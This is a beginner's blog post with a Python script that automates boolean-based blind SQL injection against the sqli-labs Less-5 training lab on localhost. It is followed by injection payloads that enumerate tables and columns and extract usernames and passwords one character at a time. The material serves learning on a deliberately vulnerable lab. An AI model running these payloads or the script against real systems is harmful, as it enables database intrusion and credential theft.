sqli-labs第5关布尔盲注pyhton脚本 

import requests
import os

#此函数先判断数据库长度
def length(url,str):
	num = 1
	while True:
		str_num = '%d' %num
		len_url = url + "' and (select length(database()) = " + str_num +")--+"
		response = requests.get(len_url)
		if str in response.text:
			print("数据库长度为:%s" %str_num)
			content(url,str,num)
			break
		else:
			num = num + 1

#此函数判断字符串具体的内容
def content(url,str,num):
	s = ['1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
	con_num = 1
	while con_num <= num:
		str_num = '%d' %con_num
		for i in s:
			con_url = url + "' and (select mid(database(),"+ str_num +",1)='"+ i +"')--+"
			response = requests.get(con_url)
			if str in response.text:
				fwrite(i)
		con_num = con_num + 1
#此函数对字符串的内容做记录并输出
def fwrite(i):
	fp = open("cache.txt",'a')
	fp.write(i)
	fp.close()
if __name__ == '__main__':
	url = "http://localhost/sqli-labs/Less-5/?id=1"
	response = requests.get(url)
	str = "You are in..........."
	if str in response.text:
		length(url,str)
	else:
		print("请输入正确的地址")

  初学python,只注重实现功能,不要太在意某些细节,如有建议,感谢提出。

  

#库中有几个表:

1' and ((select count(table_name) from information_schema.tables where table_schema = 'security') = 4)--+

#测表名长度:

1' and (select length((select table_name from information_schema.tables where table_schema = 'security' limit 0,1)) = 10)--+

#爆表名:

1' and (select mid((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='a')--+

#表中有几列:

1' and ((select count(column_name) from information_schema.columns where table_name = 'users' and table_schema = 'security') = 3)--+

#测列名长度:

1' and (select length((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1)) = 8)--+

#爆列名:

1' and (select mid((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1),1,1)='u')--+

#爆用户名:

1' and (select mid((select username from security.users limit 0,1),1,1)='d')--+

#爆密码:

1' and (select mid((select password from security.users limit 0,1),1,1)='d')--+

 以上标红的就是需要递归测试的地方(标红的地方不显示-.-!,将就看),需要者可自行修改代码。还有上述代码中 s 列表请针对具体的情况修改,因为没有特殊字符以及大写字母等。

posted @ 2019-04-03 14:53  Spec·  阅读(1147)  评论(0编辑  收藏  举报